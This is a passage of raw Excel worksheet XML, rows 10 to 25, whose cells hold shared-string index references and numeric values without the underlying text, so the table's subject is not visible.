        <v>10</v>
      </c>
      <c r="S10" s="48" t="s">
        <v>117</v>
      </c>
      <c r="T10" s="48">
        <v>65.0</v>
      </c>
      <c r="U10" s="48">
        <v>732342.0</v>
      </c>
      <c r="V10" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W10" s="49" t="s">
        <v>118</v>
      </c>
      <c r="X10" s="49">
        <v>79.0</v>
      </c>
      <c r="Y10" s="49">
        <v>757724.0</v>
      </c>
      <c r="Z10" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA10" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AB10" s="44" t="s">
        <v>119</v>
      </c>
      <c r="AC10" s="44" t="s">
        <v>120</v>
      </c>
      <c r="AD10" s="44" t="s">
        <v>68</v>
      </c>
      <c r="AE10" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF10" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG10" s="51" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="11" ht="96.75" customHeight="1">
      <c r="B11" s="42" t="s">
        <v>107</v>
      </c>
      <c r="C11" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D11" s="43" t="s">
        <v>121</v>
      </c>
      <c r="E11" s="43" t="s">
        <v>122</v>
      </c>
      <c r="F11" s="43" t="s">
        <v>110</v>
      </c>
      <c r="G11" s="58" t="s">
        <v>123</v>
      </c>
      <c r="H11" s="44" t="s">
        <v>124</v>
      </c>
      <c r="I11" s="44" t="s">
        <v>125</v>
      </c>
      <c r="J11" s="44" t="s">
        <v>126</v>
      </c>
      <c r="K11" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L11" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M11" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N11" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O11" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P11" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q11" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R11" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S11" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T11" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U11" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V11" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W11" s="49">
        <v>2002749.0</v>
      </c>
      <c r="X11" s="49">
        <v>1.0</v>
      </c>
      <c r="Y11" s="49">
        <v>3.0</v>
      </c>
      <c r="Z11" s="46">
        <v>2002749.0</v>
      </c>
      <c r="AA11" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AB11" s="44" t="s">
        <v>127</v>
      </c>
      <c r="AC11" s="44" t="s">
        <v>10</v>
      </c>
      <c r="AD11" s="44" t="s">
        <v>106</v>
      </c>
      <c r="AE11" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF11" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG11" s="51" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="12" ht="96.75" customHeight="1">
      <c r="B12" s="42" t="s">
        <v>107</v>
      </c>
      <c r="C12" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D12" s="43" t="s">
        <v>128</v>
      </c>
      <c r="E12" s="43" t="s">
        <v>129</v>
      </c>
      <c r="F12" s="43" t="s">
        <v>130</v>
      </c>
      <c r="G12" s="58" t="s">
        <v>129</v>
      </c>
      <c r="H12" s="44" t="s">
        <v>131</v>
      </c>
      <c r="I12" s="44" t="s">
        <v>132</v>
      </c>
      <c r="J12" s="44" t="s">
        <v>133</v>
      </c>
      <c r="K12" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L12" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M12" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N12" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O12" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P12" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q12" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R12" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S12" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T12" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U12" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V12" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W12" s="49" t="s">
        <v>134</v>
      </c>
      <c r="X12" s="49">
        <v>4.0</v>
      </c>
      <c r="Y12" s="49">
        <v>12.0</v>
      </c>
      <c r="Z12" s="46">
        <v>2002752.2002749</v>
      </c>
      <c r="AA12" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AB12" s="44" t="s">
        <v>135</v>
      </c>
      <c r="AC12" s="44" t="s">
        <v>10</v>
      </c>
      <c r="AD12" s="44" t="s">
        <v>136</v>
      </c>
      <c r="AE12" s="50" t="s">
        <v>137</v>
      </c>
      <c r="AF12" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG12" s="51" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="13" ht="96.75" customHeight="1">
      <c r="B13" s="42" t="s">
        <v>107</v>
      </c>
      <c r="C13" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D13" s="43" t="s">
        <v>128</v>
      </c>
      <c r="E13" s="43" t="s">
        <v>129</v>
      </c>
      <c r="F13" s="43" t="s">
        <v>130</v>
      </c>
      <c r="G13" s="58" t="s">
        <v>129</v>
      </c>
      <c r="H13" s="44" t="s">
        <v>138</v>
      </c>
      <c r="I13" s="44" t="s">
        <v>132</v>
      </c>
      <c r="J13" s="44" t="s">
        <v>139</v>
      </c>
      <c r="K13" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L13" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M13" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N13" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O13" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P13" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q13" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R13" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S13" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T13" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U13" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V13" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W13" s="49" t="s">
        <v>134</v>
      </c>
      <c r="X13" s="49">
        <v>4.0</v>
      </c>
      <c r="Y13" s="49">
        <v>10.0</v>
      </c>
      <c r="Z13" s="46" t="s">
        <v>140</v>
      </c>
      <c r="AA13" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AB13" s="44" t="s">
        <v>135</v>
      </c>
      <c r="AC13" s="44" t="s">
        <v>10</v>
      </c>
      <c r="AD13" s="44" t="s">
        <v>136</v>
      </c>
      <c r="AE13" s="50" t="s">
        <v>137</v>
      </c>
      <c r="AF13" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG13" s="51" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="14" ht="222.75" customHeight="1">
      <c r="B14" s="42" t="s">
        <v>107</v>
      </c>
      <c r="C14" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D14" s="43" t="s">
        <v>128</v>
      </c>
      <c r="E14" s="43" t="s">
        <v>141</v>
      </c>
      <c r="F14" s="43" t="s">
        <v>142</v>
      </c>
      <c r="G14" s="58" t="s">
        <v>141</v>
      </c>
      <c r="H14" s="44" t="s">
        <v>143</v>
      </c>
      <c r="I14" s="44" t="s">
        <v>144</v>
      </c>
      <c r="J14" s="44" t="s">
        <v>145</v>
      </c>
      <c r="K14" s="45" t="s">
        <v>146</v>
      </c>
      <c r="L14" s="45">
        <v>12.0</v>
      </c>
      <c r="M14" s="45">
        <v>4718.0</v>
      </c>
      <c r="N14" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O14" s="47" t="s">
        <v>147</v>
      </c>
      <c r="P14" s="47">
        <v>25.0</v>
      </c>
      <c r="Q14" s="47">
        <v>4986.0</v>
      </c>
      <c r="R14" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S14" s="48" t="s">
        <v>148</v>
      </c>
      <c r="T14" s="48">
        <v>35.0</v>
      </c>
      <c r="U14" s="48">
        <v>10020.0</v>
      </c>
      <c r="V14" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W14" s="49" t="s">
        <v>149</v>
      </c>
      <c r="X14" s="49">
        <v>56.0</v>
      </c>
      <c r="Y14" s="49">
        <v>12833.0</v>
      </c>
      <c r="Z14" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA14" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AB14" s="44" t="s">
        <v>150</v>
      </c>
      <c r="AC14" s="53" t="s">
        <v>151</v>
      </c>
      <c r="AD14" s="44" t="s">
        <v>152</v>
      </c>
      <c r="AE14" s="50" t="s">
        <v>137</v>
      </c>
      <c r="AF14" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG14" s="51" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="15" ht="222.75" customHeight="1">
      <c r="B15" s="42" t="s">
        <v>153</v>
      </c>
      <c r="C15" s="43" t="s">
        <v>154</v>
      </c>
      <c r="D15" s="43" t="s">
        <v>155</v>
      </c>
      <c r="E15" s="43" t="s">
        <v>156</v>
      </c>
      <c r="F15" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G15" s="58" t="s">
        <v>10</v>
      </c>
      <c r="H15" s="44" t="s">
        <v>157</v>
      </c>
      <c r="I15" s="44" t="s">
        <v>158</v>
      </c>
      <c r="J15" s="44" t="s">
        <v>159</v>
      </c>
      <c r="K15" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L15" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M15" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N15" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O15" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P15" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q15" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R15" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S15" s="48" t="s">
        <v>160</v>
      </c>
      <c r="T15" s="48">
        <v>2.0</v>
      </c>
      <c r="U15" s="48">
        <v>6.0</v>
      </c>
      <c r="V15" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W15" s="49" t="s">
        <v>161</v>
      </c>
      <c r="X15" s="49">
        <v>7.0</v>
      </c>
      <c r="Y15" s="49">
        <v>53.0</v>
      </c>
      <c r="Z15" s="46" t="s">
        <v>162</v>
      </c>
      <c r="AA15" s="50" t="s">
        <v>163</v>
      </c>
      <c r="AB15" s="44" t="s">
        <v>164</v>
      </c>
      <c r="AC15" s="44" t="s">
        <v>165</v>
      </c>
      <c r="AD15" s="44" t="s">
        <v>106</v>
      </c>
      <c r="AE15" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF15" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG15" s="51" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="16" ht="153.75" customHeight="1">
      <c r="B16" s="42" t="s">
        <v>153</v>
      </c>
      <c r="C16" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D16" s="43" t="s">
        <v>166</v>
      </c>
      <c r="E16" s="43" t="s">
        <v>167</v>
      </c>
      <c r="F16" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G16" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H16" s="44" t="s">
        <v>168</v>
      </c>
      <c r="I16" s="44" t="s">
        <v>169</v>
      </c>
      <c r="J16" s="44" t="s">
        <v>170</v>
      </c>
      <c r="K16" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L16" s="45">
        <v>0.0</v>
      </c>
      <c r="M16" s="45">
        <v>0.0</v>
      </c>
      <c r="N16" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O16" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P16" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q16" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R16" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S16" s="48">
        <v>50447.0</v>
      </c>
      <c r="T16" s="48">
        <v>1.0</v>
      </c>
      <c r="U16" s="48">
        <v>3.0</v>
      </c>
      <c r="V16" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W16" s="49" t="s">
        <v>171</v>
      </c>
      <c r="X16" s="49">
        <v>3.0</v>
      </c>
      <c r="Y16" s="49">
        <v>7.0</v>
      </c>
      <c r="Z16" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA16" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB16" s="62" t="s">
        <v>172</v>
      </c>
      <c r="AC16" s="62" t="s">
        <v>173</v>
      </c>
      <c r="AD16" s="44" t="s">
        <v>57</v>
      </c>
      <c r="AE16" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF16" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG16" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="17" ht="153.75" customHeight="1">
      <c r="B17" s="42" t="s">
        <v>153</v>
      </c>
      <c r="C17" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D17" s="43" t="s">
        <v>166</v>
      </c>
      <c r="E17" s="43" t="s">
        <v>167</v>
      </c>
      <c r="F17" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G17" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H17" s="44" t="s">
        <v>168</v>
      </c>
      <c r="I17" s="44" t="s">
        <v>169</v>
      </c>
      <c r="J17" s="44" t="s">
        <v>174</v>
      </c>
      <c r="K17" s="45" t="s">
        <v>175</v>
      </c>
      <c r="L17" s="45">
        <v>3.0</v>
      </c>
      <c r="M17" s="45">
        <v>5.0</v>
      </c>
      <c r="N17" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O17" s="47" t="s">
        <v>176</v>
      </c>
      <c r="P17" s="47">
        <v>9.0</v>
      </c>
      <c r="Q17" s="47">
        <v>82.0</v>
      </c>
      <c r="R17" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S17" s="48" t="s">
        <v>177</v>
      </c>
      <c r="T17" s="48">
        <v>13.0</v>
      </c>
      <c r="U17" s="48">
        <v>458.0</v>
      </c>
      <c r="V17" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W17" s="49" t="s">
        <v>178</v>
      </c>
      <c r="X17" s="49">
        <v>17.0</v>
      </c>
      <c r="Y17" s="49">
        <v>536.0</v>
      </c>
      <c r="Z17" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA17" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB17" s="62" t="s">
        <v>172</v>
      </c>
      <c r="AC17" s="62" t="s">
        <v>173</v>
      </c>
      <c r="AD17" s="44" t="s">
        <v>68</v>
      </c>
      <c r="AE17" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF17" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG17" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="18" ht="153.75" customHeight="1">
      <c r="B18" s="42" t="s">
        <v>153</v>
      </c>
      <c r="C18" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D18" s="43" t="s">
        <v>166</v>
      </c>
      <c r="E18" s="43" t="s">
        <v>167</v>
      </c>
      <c r="F18" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G18" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H18" s="44" t="s">
        <v>168</v>
      </c>
      <c r="I18" s="44" t="s">
        <v>179</v>
      </c>
      <c r="J18" s="44" t="s">
        <v>180</v>
      </c>
      <c r="K18" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L18" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M18" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N18" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O18" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P18" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q18" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R18" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S18" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T18" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U18" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V18" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W18" s="49">
        <v>2002749.0</v>
      </c>
      <c r="X18" s="49">
        <v>1.0</v>
      </c>
      <c r="Y18" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z18" s="46">
        <v>2002749.0</v>
      </c>
      <c r="AA18" s="61" t="s">
        <v>181</v>
      </c>
      <c r="AB18" s="62" t="s">
        <v>182</v>
      </c>
      <c r="AC18" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD18" s="44" t="s">
        <v>152</v>
      </c>
      <c r="AE18" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF18" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG18" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="19" ht="196.5" customHeight="1">
      <c r="B19" s="42" t="s">
        <v>153</v>
      </c>
      <c r="C19" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D19" s="43" t="s">
        <v>183</v>
      </c>
      <c r="E19" s="43" t="s">
        <v>184</v>
      </c>
      <c r="F19" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G19" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H19" s="44" t="s">
        <v>185</v>
      </c>
      <c r="I19" s="44" t="s">
        <v>186</v>
      </c>
      <c r="J19" s="44" t="s">
        <v>187</v>
      </c>
      <c r="K19" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L19" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M19" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N19" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O19" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P19" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q19" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R19" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S19" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T19" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U19" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V19" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W19" s="49" t="s">
        <v>75</v>
      </c>
      <c r="X19" s="49">
        <v>2.0</v>
      </c>
      <c r="Y19" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z19" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA19" s="61" t="s">
        <v>188</v>
      </c>
      <c r="AB19" s="62" t="s">
        <v>189</v>
      </c>
      <c r="AC19" s="62" t="s">
        <v>190</v>
      </c>
      <c r="AD19" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE19" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF19" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG19" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="20" ht="177.0" customHeight="1">
      <c r="B20" s="42" t="s">
        <v>153</v>
      </c>
      <c r="C20" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D20" s="43" t="s">
        <v>183</v>
      </c>
      <c r="E20" s="43" t="s">
        <v>184</v>
      </c>
      <c r="F20" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G20" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H20" s="44" t="s">
        <v>191</v>
      </c>
      <c r="I20" s="44" t="s">
        <v>186</v>
      </c>
      <c r="J20" s="44" t="s">
        <v>192</v>
      </c>
      <c r="K20" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L20" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M20" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N20" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O20" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P20" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q20" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R20" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S20" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T20" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U20" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V20" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W20" s="49" t="s">
        <v>75</v>
      </c>
      <c r="X20" s="49">
        <v>2.0</v>
      </c>
      <c r="Y20" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z20" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA20" s="61" t="s">
        <v>188</v>
      </c>
      <c r="AB20" s="62" t="s">
        <v>189</v>
      </c>
      <c r="AC20" s="62" t="s">
        <v>193</v>
      </c>
      <c r="AD20" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE20" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF20" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG20" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="21" ht="153.75" customHeight="1">
      <c r="B21" s="64" t="s">
        <v>153</v>
      </c>
      <c r="C21" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D21" s="43" t="s">
        <v>194</v>
      </c>
      <c r="E21" s="43" t="s">
        <v>195</v>
      </c>
      <c r="F21" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G21" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H21" s="44" t="s">
        <v>196</v>
      </c>
      <c r="I21" s="44" t="s">
        <v>197</v>
      </c>
      <c r="J21" s="44" t="s">
        <v>198</v>
      </c>
      <c r="K21" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L21" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M21" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N21" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O21" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P21" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q21" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R21" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S21" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T21" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U21" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V21" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W21" s="49" t="s">
        <v>10</v>
      </c>
      <c r="X21" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y21" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z21" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA21" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB21" s="62" t="s">
        <v>199</v>
      </c>
      <c r="AC21" s="62" t="s">
        <v>200</v>
      </c>
      <c r="AD21" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE21" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF21" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG21" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="22" ht="153.75" customHeight="1">
      <c r="B22" s="64" t="s">
        <v>153</v>
      </c>
      <c r="C22" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D22" s="43" t="s">
        <v>201</v>
      </c>
      <c r="E22" s="43" t="s">
        <v>202</v>
      </c>
      <c r="F22" s="43" t="s">
        <v>203</v>
      </c>
      <c r="G22" s="43" t="s">
        <v>204</v>
      </c>
      <c r="H22" s="44" t="s">
        <v>205</v>
      </c>
      <c r="I22" s="44" t="s">
        <v>10</v>
      </c>
      <c r="J22" s="44" t="s">
        <v>206</v>
      </c>
      <c r="K22" s="45">
        <v>1292.46983</v>
      </c>
      <c r="L22" s="45">
        <v>2.0</v>
      </c>
      <c r="M22" s="45">
        <v>3.0</v>
      </c>
      <c r="N22" s="46"/>
      <c r="O22" s="47">
        <v>1292.46983</v>
      </c>
      <c r="P22" s="47">
        <v>2.0</v>
      </c>
      <c r="Q22" s="47">
        <v>3.0</v>
      </c>
      <c r="R22" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S22" s="48" t="s">
        <v>207</v>
      </c>
      <c r="T22" s="48">
        <v>3.0</v>
      </c>
      <c r="U22" s="48">
        <v>7.0</v>
      </c>
      <c r="V22" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W22" s="49" t="s">
        <v>208</v>
      </c>
      <c r="X22" s="49">
        <v>6.0</v>
      </c>
      <c r="Y22" s="49">
        <v>63.0</v>
      </c>
      <c r="Z22" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA22" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB22" s="65" t="s">
        <v>209</v>
      </c>
      <c r="AC22" s="66" t="s">
        <v>10</v>
      </c>
      <c r="AD22" s="44" t="s">
        <v>152</v>
      </c>
      <c r="AE22" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF22" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG22" s="67" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="23" ht="153.75" customHeight="1">
      <c r="B23" s="64" t="s">
        <v>153</v>
      </c>
      <c r="C23" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D23" s="43" t="s">
        <v>201</v>
      </c>
      <c r="E23" s="43" t="s">
        <v>202</v>
      </c>
      <c r="F23" s="43" t="s">
        <v>88</v>
      </c>
      <c r="G23" s="43" t="s">
        <v>210</v>
      </c>
      <c r="H23" s="44" t="s">
        <v>211</v>
      </c>
      <c r="I23" s="44" t="s">
        <v>212</v>
      </c>
      <c r="J23" s="44" t="s">
        <v>213</v>
      </c>
      <c r="K23" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L23" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M23" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N23" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O23" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P23" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q23" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R23" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S23" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T23" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U23" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V23" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W23" s="49" t="s">
        <v>93</v>
      </c>
      <c r="X23" s="49">
        <v>3.0</v>
      </c>
      <c r="Y23" s="49">
        <v>20.0</v>
      </c>
      <c r="Z23" s="46" t="s">
        <v>93</v>
      </c>
      <c r="AA23" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB23" s="65" t="s">
        <v>214</v>
      </c>
      <c r="AC23" s="66" t="s">
        <v>96</v>
      </c>
      <c r="AD23" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE23" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF23" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG23" s="67" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="24" ht="153.75" customHeight="1">
      <c r="B24" s="64" t="s">
        <v>153</v>
      </c>
      <c r="C24" s="43" t="s">
        <v>215</v>
      </c>
      <c r="D24" s="43" t="s">
        <v>216</v>
      </c>
      <c r="E24" s="43" t="s">
        <v>217</v>
      </c>
      <c r="F24" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G24" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H24" s="44" t="s">
        <v>218</v>
      </c>
      <c r="I24" s="44" t="s">
        <v>219</v>
      </c>
      <c r="J24" s="44" t="s">
        <v>220</v>
      </c>
      <c r="K24" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L24" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M24" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N24" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O24" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P24" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q24" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R24" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S24" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T24" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U24" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V24" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W24" s="49" t="s">
        <v>221</v>
      </c>
      <c r="X24" s="49">
        <v>3.0</v>
      </c>
      <c r="Y24" s="49">
        <v>43.0</v>
      </c>
      <c r="Z24" s="46" t="s">
        <v>222</v>
      </c>
      <c r="AA24" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB24" s="62" t="s">
        <v>223</v>
      </c>
      <c r="AC24" s="62" t="s">
        <v>224</v>
      </c>
      <c r="AD24" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE24" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF24" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG24" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="25" ht="153.75" customHeight="1">
      <c r="B25" s="64" t="s">
        <v>153</v>
      </c>
      <c r="C25" s="43" t="s">
        <v>215</v>
      </c>
      <c r="D25" s="43" t="s">
        <v>216</v>
      </c>
      <c r="E25" s="43" t="s">
        <v>217</v>
      </c>
      <c r="F25" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G25" s="43" t="s">
        <v>10</v>
      </c>
